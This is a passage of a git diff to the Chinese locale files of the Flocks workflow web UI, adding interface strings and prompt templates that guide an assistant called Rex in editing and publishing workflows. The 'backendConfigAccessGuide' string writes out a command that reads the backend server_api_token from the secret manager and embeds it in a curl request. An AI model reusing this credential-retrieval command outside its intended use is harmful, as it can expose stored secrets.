+++ b/webui/src/locales/zh-CN/update.json
@@ -21,7 +21,8 @@
   "waitingRestart": "等待重启...",
   "checkFailed": "检查版本失败",
   "upgradeFailed": "升级失败",
-  "restartTimeout": "服务重启超时，请手动刷新页面",
+  "restartTimeout": "服务恢复确认超时：{{reason}}。请手动刷新页面确认状态。",
+  "restartUnknown": "未收到明确的健康检查结果",
   "dismissAction": "不再提醒",
   "dockerModeTitle": "Docker 部署",
   "dockerModeDesc": "当前通过 Docker 运行 Flocks，暂不支持页面内原地升级。请拉取最新镜像并重启容器完成升级。",
diff --git a/webui/src/locales/zh-CN/workflow.json b/webui/src/locales/zh-CN/workflow.json
index 029008d6f..1fa408bb4 100644
--- a/webui/src/locales/zh-CN/workflow.json
+++ b/webui/src/locales/zh-CN/workflow.json
@@ -38,19 +38,69 @@
     "notFound": "工作流不存在",
     "backToList": "返回列表",
     "resetLayout": "重置布局",
-    "downloadMd": "下载 MD",
-    "downloadMdTitle": "下载 MD 文件",
-    "downloadJson": "下载 JSON",
-    "downloadJsonTitle": "下载 JSON 文件",
+    "flocksHelp": "让 Rex 帮你配置、编辑工作流",
+    "flocksHelpTitle": "让 Rex 帮你配置、编辑工作流",
+    "downloadMd": "下载说明文件",
+    "downloadMdTitle": "下载当前说明文件",
+    "downloadJson": "下载工作流文件",
+    "downloadJsonTitle": "下载工作流文件",
     "dragAdjust": "拖动调整面板宽度",
     "exportFailed": "导出失败",
-    "noMdDesc": "暂无 MD 描述文件",
-    "noMdDescHint": "在右侧对话中描述需求，AI 将自动生成",
-    "mdUpdatedHint": "AI 已更新流程描述，请查看 MD 文档确认需求，然后在右侧对话中给出修改意见。",
+    "noMdDesc": "暂无 workflow.md",
+    "noMdDescHint": "生成一份面向人和 Flocks 都友好的 workflow.md",
+    "mdUpdatedHint": "AI 已更新 workflow.md，左侧已显示差异，请查看后继续在右侧对话中反馈。",
+    "editDocTitle": "workflow.md",
+    "editDocUnsaved": "未保存",
+    "editDocModeEdit": "编辑",
+    "editDocModePreview": "预览",
+    "editDocDiffTitle": "AI 修改差异",
+    "editDocDiffReviewDesc": "AI 已把修改写入 workflow.md。接受会保留当前内容；拒绝会回滚到修改前内容。",
+    "editDocDiffHunkTitle": "变更 {{index}}",
+    "editDocDiffAdded": "新增",
+    "editDocDiffRemoved": "删除",
+    "editDocDiffAccept": "接受",
+    "editDocDiffReject": "拒绝",
+    "editDocDiffAcceptHunk": "接受此段",
+    "editDocDiffRejectHunk": "拒绝此段",
+    "editDocDiffRejecting": "回滚中",
+    "editDocDiffAcceptSuccess": "已接受 AI 修改",
+    "editDocDiffAcceptHunkSuccess": "已接受此段修改",
+    "editDocDiffRejectSuccess": "已拒绝 AI 修改并回滚 workflow.md",
+    "editDocDiffRejectFailed": "拒绝 AI 修改失败",
+    "editDocDiffRejectHunkSuccess": "已拒绝此段修改并更新 workflow.md",
+    "editDocDiffRejectHunkFailed": "拒绝此段修改失败",
+    "editDocDiffEmpty": "没有检测到文本差异",
+    "editDocSave": "保存",
+    "editDocSaving": "保存中",
+    "editDocSaveSuccess": "workflow.md 已保存",
+    "editDocSaveFailed": "保存 workflow.md 失败",
+    "generateEditDoc": "生成说明",
+    "regenerateEditDoc": "重置文档",
+    "generateEditDocTitle": "让 Rex 按 workflow-builder skill 生成 workflow.md 说明文件",
+    "regenerateEditDocTitle": "重置当前 workflow.md 文档",
+    "generateWorkflow": "生成工作流",
+    "generateWorkflowTitle": "让右侧工作台基于当前 workflow.md 生成或更新 workflow.json",
+    "regenerateWorkflowConfirmTitle": "生成工作流？",
+    "regenerateWorkflowConfirmDesc": "workflow.md 已保存，是否立即基于当前内容生成或更新 workflow.json？",
+    "regenerateWorkflowConfirmYes": "生成",
+    "regenerateWorkflowConfirmNo": "暂不生成",
+    "editDocEmpty": "暂无 workflow.md",
+    "editDocEmptyHint": "根据当前流程图和节点说明生成一份结构化、可编辑、可用于生成工作流的 workflow.md。",
+    "editDocPlaceholder": "在这里编辑 workflow.md...",
+    "editDocTextareaLabel": "编辑 workflow.md",
+    "generateEditDocPrompt": "这是用户点击「生成说明」触发的新任务。按钮含义是：先按 workflow-builder skill 生成或补齐当前工作流的 workflow.md 说明文件；此任务不是生成 workflow.json，除非我后续明确要求，不要修改 workflow.json。\n\n工作流名称：{{name}}\n工作流目录：{{dir}}\nMD 文件：{{mdPath}}\nJSON 定义文件：{{jsonPath}}\n\n当前情况：存在 workflow.json，但 workflow.md 不存在或左侧说明为空。进入工作台后必须先生成 workflow.md。\n\n请按下面流程推进：\n1. 先加载并遵守 workflow-builder skill。\n2. 必须使用 question 工具询问我需要中文流程说明文档还是英文流程说明文档；一次只问一个问题，必须允许自定义输入。\n3. 读取现有 workflow.json 和相关工作流文件，结合下面的 workflow.json 内容理解已有节点、输入、输出、触发器和执行逻辑。\n4. 参考 workflow-builder skill 中的 workflow_zh.md / workflow_en.md 模板结构，只生成一份 workflow.md。\n5. workflow.md 要面向人编辑：说明功能、适用场景、输入输出、节点流程、可修改点、样例和验收方式；不要写得像机器 JSON 说明。\n6. 写入 workflow.md 前先展示 diff 并等待我确认；确认后再写入 {{mdPath}}。\n7. 完成后说明 workflow.md 是如何生成的，以及下一步可以点击「生成工作流」基于 workflow.md 更新 workflow.json。\n\n当前 workflow.json：\n~~~json\n{{workflowJson}}\n~~~",
+    "generateWorkflowPrompt": "这是用户点击「生成工作流」按钮触发的新任务。按钮含义是：基于当前 workflow.md 生成或更新机器可执行的 workflow.json；除非我明确要求，请不要重新生成或重写 workflow.md。\n\n工作流名称：{{name}}\n工作流目录：{{dir}}\nMD 文件：{{mdPath}}\nJSON 定义文件：{{jsonPath}}\n\n请按下面流程推进：\n1. 先加载 workflow-builder skill。\n2. 读取现有 workflow.md 和 workflow.json，结合当前流程图结构理解已有实现。\n3. 以当前编辑器中的 workflow.md 内容作为主要意图来源；如果磁盘上的 workflow.md 与下面内容不同，以下面的内容为准。\n4. 只生成/更新 workflow.json，保留现有工作流中仍然合理的触发器、样例输入和元数据。\n5. 先给出简短生成计划；需要写 workflow.json 时，先展示 diff 并等待我确认。\n6. 生成后的 workflow.json 必须是合法 JSON，节点和边必须能组成完整流程图。\n7. 完成后说明 workflow.json 改了什么，以及我应该如何测试。\n\n当前编辑器中的 workflow.md 内容：\n~~~markdown\n{{editDocContent}}\n~~~",
     "canvasTabs": {
       "flow": "流程图",
-      "md": "MD 描述",
-      "json": "JSON"
+      "md": "流程说明",
+      "json": "工作流文件"
+    },
+    "flowControls": {
+      "zoomIn": "放大",
+      "zoomOut": "缩小",
+      "fitView": "适应视图",
+      "collapse": "折叠画布工具",
+      "expand": "展开画布工具"
     },
     "topBar": {
       "collapsePanel": "收起面板",
@@ -68,9 +118,8 @@
     },
     "rightPanel": {
       "tabOverview": "概览",
-      "tabChat": "AI 编辑",
-      "tabRun": "运行",
-      "tabIntegration": "集成",
+      "tabChat": "工作台",
+      "tabIntegration": "发布",
       "renderError": "组件渲染出错",
       "deleteWorkflow": "删除工作流",
       "deleteConfirmTitle": "删除工作流",
@@ -80,7 +129,8 @@
       "deleting": "删除中..."
     },
     "overview": {
-      "configInfo": "配置信息",
+      "configInfo": "信息",
+      "workflowInfo": "基本信息",
       "nodeCount": "节点数",
       "nodesAndEdges": "{{nodes}} 个节点 / {{edges}} 条边",
       "category": "分类",
@@ -88,6 +138,10 @@
       "createdBy": "创建人",
       "createdAt": "创建时间",
       "updatedAt": "更新时间",
+      "workflowFiles": "工作流文件",
+      "fileDir": "文件目录",
+      "notGenerated": "（尚未生成）",
+      "run": "运行",
       "runStats": "运行统计",
       "totalCalls": "总调用次数",
       "successRate": "成功率",
@@ -184,8 +238,10 @@
       "nodeLabel": "{{type}} 节点"
     },
     "run": {
-      "testSection": "测试",
+      "testSection": "测试运行",
       "inputParams": "输入参数（JSON）",
+      "testSummaryIdle": "输入参数已准备，可直接测试运行",
+      "triggerSection": "触发能力",
       "rootObjectRequired": "输入参数必须是 JSON 对象",
       "running": "运行中...",
       "testRun": "测试运行",
@@ -206,14 +262,46 @@
       "curlExample": "调用示例（curl）",
       "stopping": "停止中...",
       "stopService": "停止服务",
+      "deleteService": "删除 API 发布配置",
+      "deleteServiceShort": "删除配置",
+      "deletingService": "删除中...",
+      "deleteServiceConfirm": "确定要删除这个 API 发布配置吗？如果服务仍在运行，将会先停止服务。",
+      "deleteServiceFailed": "删除 API 发布配置失败",
       "publishDesc": "将工作流发布为独立的 API 服务，生成专属调用地址和 API Key。",
       "publishing": "发布中，请稍候...",
       "publishAsApi": "发布为 API 服务",
+      "guidePanelTitle": "Rex 辅助发布",
+      "guidePanelDesc": "选择一种发布方式，Rex 会先读取 guide.md 和配置库，再引导你确认、应用或启动。",
+      "cardGuideTitle": "Flocks 辅助配置",
+      "cardGuideAction": "辅助配置",
+      "cardGuideApiFocus": "API 发布配置",
+      "cardGuideApiDesc": "结合当前 API 服务状态、运行方式和工作流功能，引导确认发布、鉴权、调用样例和是否启动。",
+      "cardGuideTriggerDesc": "结合当前 {{trigger}} 卡片配置和工作流功能，引导确认接入参数、字段映射、样例和生效方式。",
+      "cardGuideDisplayLabel": "Flocks 辅助配置：{{focus}}",
+      "guideApiShort": "发布为 API",
+      "guideApiDesc": "让 Rex 引导确认 API 模板、运行驱动、认证、调用路径和是否启动服务。",
+      "guideApiInstruction": "用户从发布页点击了 API 发布引导。请围绕“发布为 API”的发布配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 让后端迁移 config.json 兜底模板。config.json 和 workflow.json 中的发布/触发配置只可作为模板来源，不是直接写入目标，也不是已生效状态。需要变更模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要真正启动/停止 API 服务，模板确认后再走 {{publishEndpoint}} / {{unpublishEndpoint}}，不要通过改模板字段冒充运行态发布。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未发布，不要继续询问要对 workflow.json 模板做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideSyslogShort": "Syslog 接入",
+      "guideSyslogDesc": "让 Rex 引导确认 Syslog 触发模板、端口协议、字段映射和监听启停。",
+      "guideSyslogInstruction": "用户从发布页点击了 Syslog 接入引导。请围绕 Syslog 触发/监听配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Syslog 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止监听，使用对应运行态接口，不要通过修改模板 enabled 字段冒充监听状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideKafkaShort": "Kafka 接入",
+      "guideKafkaDesc": "让 Rex 引导确认 Kafka 触发模板、broker、topic、group、输入映射和启停。",
+      "guideKafkaInstruction": "用户从发布页点击了 Kafka 接入引导。请围绕 Kafka 触发/消费配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Kafka 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止消费，使用对应运行态接口，不要通过修改模板 enabled 字段冒充消费状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideScheduleShort": "定时触发",
+      "guideScheduleDesc": "让 Rex 引导确认定时触发模板、周期、输入参数、超时和启停。",
+      "guideScheduleInstruction": "用户从发布页点击了定时触发引导。请围绕 Schedule/Workflow Poller 配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整定时触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止轮询，使用对应运行态接口，不要通过修改模板 enabled 字段冒充运行状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideWebhookShort": "Webhook 接入",
+      "guideWebhookDesc": "让 Rex 引导确认 Webhook 触发模板、路径、方法、认证、映射和样例。",
+      "guideWebhookInstruction": "用户从发布页点击了 Webhook 接入引导。请围绕 Webhook 发布/接入配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的 Webhook 触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Webhook 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用，不要继续询问要对 workflow.json 模板 Webhook 触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideAdapterShort": "自定义接入",
+      "guideAdapterDesc": "让 Rex 引导确认自定义接入模板、适配器、输入输出契约和验证方式。",
+      "guideAdapterInstruction": "用户从发布页点击了自定义接入引导。请围绕自定义 Trigger/Adapter 配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整自定义接入模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
       "dockerStarting": "正在启动 Docker 容器，可能需要 1-2 分钟...",
       "localStarting": "正在启动本地 API 服务...",
       "serviceDriver": "运行方式",
       "driverLocal": "本地进程",
       "driverDocker": "Docker 容器",
+      "applyDriver": "应用运行方式",
       "recommended": "推荐",
       "driverLocalDesc": "优先推荐，启动更快，适合本机开发和调试",
       "driverDockerDesc": "隔离运行，适合验证容器化部署",
@@ -270,6 +358,8 @@
       "syslogPortError": "端口范围无效，请输入 1 ~ 65535 之间的整数",
       "syslogActive": "监听中",
       "historySection": "执行历史",
+      "historySummary": "{{count}} 条记录 · 最近 {{time}}",
+      "historySummaryLoading": "正在加载执行历史",
       "noHistory": "暂无执行记录",
       "noOutput": "无输出数据",
       "stepsCompleted": "步已完成",
@@ -282,21 +372,74 @@
       "currentLabel": "当前",
       "inputPlaceholder": "描述你想对工作流做的修改... (Enter 发送)",
       "sessionTitle": "修改工作流「{{name}}」",
-      "contextMessage": "你是一个工作流专家助手，正在帮助用户修改 Flocks 工作流。请根据用户的需求修改工作流文件。\n\n工作流名称： {{name}}\n分类： {{category}}\n工作流目录： {{dir}}\n\n文件路径：\n- MD 描述文件：{{mdPath}}\n- JSON 定义文件：{{jsonPath}}\n\n请先加载 workflow-builder skill，完成工作流的修改。",
+      "backendConfigAccessGuide": "后端配置库认证方式：直接 curl 访问 GET {{configEndpoint}} 会返回 401 AuthError；读取/写入必须使用 Flocks 后端 API token `server_api_token`，它存于 `flocks.security.get_secret_manager()`。它不是浏览器 cookie，也不是 `flocks.json` 里 `api_services` 下的 `apiKey`（那些是外部平台凭证）。后端服务端口是 8000，前端 WebUI 5173 只通过 Vite proxy 转发。获取 token 命令：`python3 -c \"from flocks.security import get_secret_manager; print(get_secret_manager().get('server_api_token'))\"`。读取配置命令：`curl -H \"Authorization: Bearer $(python3 -c 'from flocks.security import get_secret_manager; print(get_secret_manager().get(\"server_api_token\"))')\" \"http://127.0.0.1:8000{{configEndpoint}}\"`。写入配置用 `PUT {{configEndpoint}}`；迁移兜底模板用 `POST {{configSyncEndpoint}}`。相关文件：`flocks/security.py`、`flocks/server/auth.py`、`flocks/cli/main.py`、`webui/src/config/apiProxy.ts`。",
+      "contextMessage": "你是一个工作流专家助手，正在帮助用户修改或配置 Flocks 工作流。请根据用户的需求选择合适的 skill 和文件操作。\n\n工作流 ID： {{id}}\n工作流名称： {{name}}\n分类： {{category}}\n工作流目录： {{dir}}\n\n文件路径：\n- 工作流说明文件：{{mdPath}}\n- 工作流配置引导文件：{{guidePath}}\n- JSON 定义文件：{{jsonPath}}\n\n配置接口：\n- 配置模板读取/写入：GET/PUT {{configEndpoint}}\n- 兜底模板迁移：POST {{configSyncEndpoint}}\n- API 服务启停：POST {{publishEndpoint}} / {{unpublishEndpoint}}\n- 触发器模板管理：{{triggersEndpoint}}\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\nSkill 选择规则：\n- 修改、重新生成或创建工作流文件时，请先加载 workflow-builder skill，并以 workflow.md 作为主要意图来源。\n- 当用户要求 Flocks 帮助、智能配置、检查配置、发布/集成配置或样例验证时，可以加载 skill_load(name=\"{{configSkillName}}\") 获取交互协议，但必须优先读取并遵循当前工作流目录里的 guide.md；不要用通用 skill 或 skill references 替代 guide.md 里的工作流细节。\n\n智能配置向导规则：\n- 配置开始前必须先读取 {{guidePath}}。如果该文件不存在或内容不足，先说明缺失，并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md；不要凭通用模板猜测配置细节。\n- 发布、接入、触发配置必须优先读取后端配置库：GET {{configEndpoint}}。如果库里没有模板，再用 POST {{configSyncEndpoint}} 迁移 workflow 目录下的 config.json；config.json 和 workflow.json 中的 triggers 只是导入/兜底模板，不是直接写入目标，也不能用来判断配置已生效。\n- 需要修改发布/接入/触发模板时，必须先展示相对后端配置的 diff，并通过 question 工具确认；确认后 PUT 完整配置对象到 {{configEndpoint}}。不要直接修改 workflow-local config.json 或 workflow.json 来表示配置已生效。\n- 发布、启动、停止、启用、停用是运行态动作，必须走前端当前 API 清单里的运行态接口（如 {{publishEndpoint}}、{{unpublishEndpoint}}、{{triggersEndpoint}} 或具体类型接口），不要通过改模板 enabled 字段冒充运行态状态。\n- 如果后端配置接口不可用，必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未发布、未启动；不要追问用户要对 workflow.json 里的模板触发器做什么，不要说用户需要在 WebUI 上发布来替代本次应用结果。\n- 引导必须傻瓜式：需要用户选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复里写问题；一次只发一个问题卡片，默认推荐选项优先，并提供自定义/补充输入（没有则填 none）。\n- 不要在聊天中索要或暴露明文密钥；需要密钥时使用系统的密钥管理方式。\n- 优先帮助用户完成：理解当前配置、补齐关键选择、准备一条样例、验证输入输出、再生成最终说明。",
       "welcome": {
         "title": "工作流「{{name}}」",
-        "descPart1": "描述你的修改需求，AI 将先更新 MD 描述文件，请对照左侧",
-        "mdTabLabel": "「MD 描述」",
-        "descPart2": "视图审查流程是否正确，确认后 AI 将同步更新 JSON 定义文件。",
-        "fileDir": "工作流文件目录",
-        "notGenerated": "（尚未生成）",
+        "descPart1": "你可以直接描述修改需求，也可以先用 Flocks 帮助梳理配置。需要改动时，AI 会先参考 workflow.md，请对照左侧",
+        "mdTabLabel": "「流程说明」",
+        "descPart2": "视图审查流程是否正确，确认后再同步 JSON 定义文件。",
+        "editPanelTitle": "Rex 辅助修改",
+        "editPanelDesc": "选择一个修改入口，Rex 会先读取当前工作流的 workflow.md 和 workflow.json，再引导你确认并修改「{{name}}」。",
+        "editSectionTitle": "辅助修改",
+        "configSectionTitle": "辅助配置",
+        "publishSectionTitle": "辅助发布",
+        "editRequirementShort": "修改功能需求",
+        "editRequirementDesc": "把你想改的功能目标整理成可同步到 workflow.md 的结构化需求。",
+        "editRequirementPrompt": "用户点击了「修改功能需求」按钮。请按 workflow-builder skill 帮我修改已有 Flocks 工作流的功能需求。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，先总结当前功能、输入输出、节点流程和已知限制；然后用 question 工具一次只问一个最关键问题，确认我要修改的目标、范围、输入输出变化、验收标准和是否影响发布/触发配置。未展示计划和 diff 并得到确认前不要写任何文件。",
+        "editNodeFunctionShort": "修改节点功能",
+        "editNodeFunctionDesc": "调整某个节点负责什么、处理逻辑、输入输出和判定规则。",
+        "editNodeFunctionPrompt": "用户点击了「修改节点功能」按钮。请按 workflow-builder skill 帮我修改已有 Flocks 工作流中某个节点的业务功能。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，列出当前节点功能摘要；然后用 question 工具确认要修改哪个节点、当前功能、目标功能、输入输出变化、验收标准、是否影响代码实现、上下游节点或发布配置。未确认前不要写文件；需要修改时，先更新 workflow.md 中对应节点的功能说明并展示 diff，确认后再同步 workflow.json。",
+        "editNodeShort": "编辑节点实现",
+        "editNodeDesc": "修改执行代码、字段映射、工具参数或上下游连接。",
+        "editNodePrompt": "用户点击了「编辑节点实现」按钮。请按 workflow-builder skill 帮我编辑已有 Flocks 工作流节点的实现细节。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，列出当前节点和边的简要结构；然后用 question 工具确认要修改哪个节点、执行逻辑、代码或工具参数、输入输出变化、是否影响上下游边关系和样例数据。修改前先给出计划和 diff，不要直接写文件。",
+        "editFlowShort": "调整流程结构",
+        "editFlowDesc": "新增、删除、移动节点，调整分支、循环、汇合和数据流转。",
+        "editFlowPrompt": "用户点击了「调整流程结构」按钮。请按 workflow-builder skill 帮我调整已有 Flocks 工作流结构。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，并输出当前 Mermaid 流程简图；然后用 question 工具确认要新增/删除/移动哪些节点、分支条件、循环或 join 逻辑、字段流转和样例影响。未确认前不要写文件；需要修改时先展示 workflow.md/workflow.json 的计划和 diff。",
+        "editRegenerateShort": "生成工作流",
+        "editRegenerateDesc": "基于当前 workflow.md 生成 workflow.json 或修复结构不一致。",
+        "editRegeneratePrompt": "用户点击了「生成工作流」按钮。这个按钮的意思是：请按 workflow-builder skill 基于当前 workflow.md 生成或修复这个 Flocks 工作流的 workflow.json。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，比较人读意图与机器定义是否一致；目标是生成/更新 workflow.json，不要重新生成或重写 workflow.md；先给出简短生成计划，必要时用 question 工具确认范围；写 workflow.json 前必须展示 diff 并等待确认。",
+        "guideTitle": "Flocks 帮助已就绪",
+        "guideDesc": "点一下，我会先读取当前工作流的 guide.md，再带你做最关键的下一步。",
+        "guidePrimary": "开始智能配置",
+        "guideAudit": "检查当前配置",
+        "guideSample": "用样例验证",
+        "guidePrimaryShort": "帮我智能配置",
+        "guideAuditShort": "检查当前配置",
+        "guideSampleShort": "验证样例数据",
+        "guideInputModeShort": "配置输入方式",
+        "guideSourceShapeShort": "确认来源数据",
+        "guideOutputShort": "设置输出去向",
+        "guideFilterShort": "调整过滤规则",
+        "guideApplyShort": "应用配置方案",
+        "guidePrimaryDesc": "Flocks 辅助进行工作流的配置",
+        "guideAuditDesc": "检查已有配置和缺失项",
+        "guideSampleDesc": "用样例验证输入输出",
+        "guideInputModeDesc": "确认告警通过 API、Syslog、Kafka、Webhook、Schedule 还是文件进入",
+        "guideSourceShapeDesc": "确认来源产品、payload 格式和是否已有样例",
+        "guideOutputDesc": "确认结果写本地、返回 API、推送 Kafka/IM 或进入下游工作流",
+        "guideFilterDesc": "确认过滤、降噪、去重等业务默认行为",
+        "guideApplyDesc": "确认应用配置、保存草稿或暂不修改",
+        "guideInputModeInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“输入模式”的语义自动提取入口、触发器、默认推荐、限制和需要收集的信息，然后发一个 question 卡片。",
+        "guideSourceShapeInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“来源形态”的语义自动提取来源系统、payload、字段映射、样例状态和需要收集的信息，然后发一个 question 卡片。",
+        "guideOutputInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“输出去向”的语义自动提取输出契约、结果保存、下游去向、外部副作用和需要收集的信息，然后发一个 question 卡片。",
+        "guideFilterInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“过滤规则”的语义自动提取过滤、降噪、去重、阈值、默认规则和需要收集的信息，然后发一个 question 卡片。",
+        "guideSampleInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“样例验证”的语义自动提取样例格式、验证步骤、禁止副作用和需要收集的信息，然后发一个 question 卡片。",
+        "guideApplyInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“应用方式”的语义自动提取发布配置来源、生效方式、草稿/应用选项、验证规则和需要收集的信息。应用发布/接入/触发模板时必须以 GET/PUT {{configEndpoint}} 为准；config.json 只允许作为 {{configSyncEndpoint}} 的迁移兜底，不能直接写它来表示已生效。如需修改，必须先展示相对后端配置的 diff，再发一个 question 卡片。",
+        "guideCollapse": "收起引导",
+        "guideExpand": "展开引导",
+        "guideNote": "默认只引导，不直接改文件；需要改动时会先给你看 diff。",
+        "guidePrompt": "用户点击了「帮我智能配置」按钮。这个按钮的意图是：请对当前工作流做一次完整配置盘点和引导，从 guide.md 里获取这个工作流有哪些可配置内容，包括但不限于发布配置、触发器/接入配置、工作流执行配置、输入输出配置、过滤/去重规则、样例验证和运行态/模板边界，并基于这些信息判断最应该先问用户的一个问题。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。配置模板接口是 GET/PUT {{configEndpoint}}，兜底模板迁移接口是 {{configSyncEndpoint}}。\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\n第一步必须读取 {{guidePath}}，并把 guide.md 作为这个工作流配置方式、问题顺序、默认选项和验证方式的唯一细节来源；可以调用 skill_load(name=\"{{configSkillName}}\") 作为交互协议，但不能用通用 skill 或 skill references 替代 guide.md。若 guide.md 不存在或内容不足，先停止并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md。需要我选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复中提问；一次只发一个问题卡片，默认推荐选项优先，并提供自定义/补充输入（没有则填 none）。发布/接入/触发模板必须先读后端配置，展示相对后端配置的 diff，确认后 PUT 完整配置到 {{configEndpoint}}；运行态动作必须使用前端当前 API 清单里的正确接口。config.json 和 workflow.json 中的 triggers 只能作为迁移兜底，不能直接写它们来表示配置已生效。后端接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库且未应用，不要追问用户要对 workflow.json 模板触发器做什么。",
+        "guideQuestionPrompt": "用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。配置模板接口是 GET/PUT {{configEndpoint}}，兜底模板迁移接口是 {{configSyncEndpoint}}。\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\n第一步必须读取 {{guidePath}}，不要要求 guide.md 存在按钮表；请把「{{focus}}」当作用户意图，自动从 guide.md 全文中提取相关的配置说明、默认值、限制、样例、验证方法和缺失信息，再基于这些引导用户。可以调用 skill_load(name=\"{{configSkillName}}\") 作为交互协议，但不能用通用 skill 或 skill references 替代 guide.md。若 guide.md 不存在或内容不足，先停止并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md。需要我选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复中提问；一次只发一个问题卡片，默认选项优先，并提供自定义/补充输入（没有则填 none）。发布/接入/触发模板必须先读后端配置，展示相对后端配置的 diff，确认后 PUT 完整配置到 {{configEndpoint}}；运行态动作必须使用前端当前 API 清单里的正确接口。config.json 和 workflow.json 中的 triggers 只能作为迁移兜底，不能直接写它们来表示配置已生效。后端接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库且未应用、未发布、未启动，不要追问用户要对 workflow.json 模板触发器做什么。",
+        "auditPrompt": "请先检查当前工作流配置和文档。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。第一步必须读取 guide.md，并以它作为配置细节来源；如果缺失，请明确指出。告诉我这个工作流已经配置好了什么、还缺什么，以及下一步最推荐我做什么。请不要修改文件。",
+        "samplePrompt": "我想用一条真实样例验证这个工作流。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。第一步必须读取 guide.md，并以其中的样例验证章节作为验证方式来源。请告诉我应该粘贴什么格式的样例，并在我粘贴后检查字段映射、归一化结果和可能的处理结果。请不要修改文件。",
         "canHelp": "我可以帮你：",
